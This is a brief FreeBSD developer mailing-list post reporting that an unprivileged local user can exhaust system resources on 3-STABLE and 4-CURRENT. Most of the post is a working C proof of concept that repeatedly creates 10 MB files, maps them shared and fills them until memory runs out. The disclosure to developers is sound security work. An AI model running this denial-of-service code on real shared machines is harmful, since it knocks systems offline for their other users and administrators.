Hi there,
Probably it is already known problem, but it seems that any unprivileged
malicious user with 15-20 MB disk quota can bring either 3-STABLE or 4-CURRENT
system to its knees using relatively simple program.
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
main()
{
int fd;
int i;
int len=1024*1024*10; /*ie 10Mbytes*/
caddr_t addr;
char ttt[80];
for (i=0;;i++)
{
sprintf (ttt,"%d",i);
fd=open(ttt,O_CREAT|O_RDWR,0666);
if (fd<0)
{
printf("open error %ld\n",errno);
exit(1);
}
lseek(fd,len-1,SEEK_SET);
write(fd,"",1);
addr=mmap(0,len,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0);
if (addr==MAP_FAILED)
{
printf("mmap error %ld",errno);
exit(1);
}
close(fd);
memset(addr,'x',len);
}
}
-Maxim
To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message
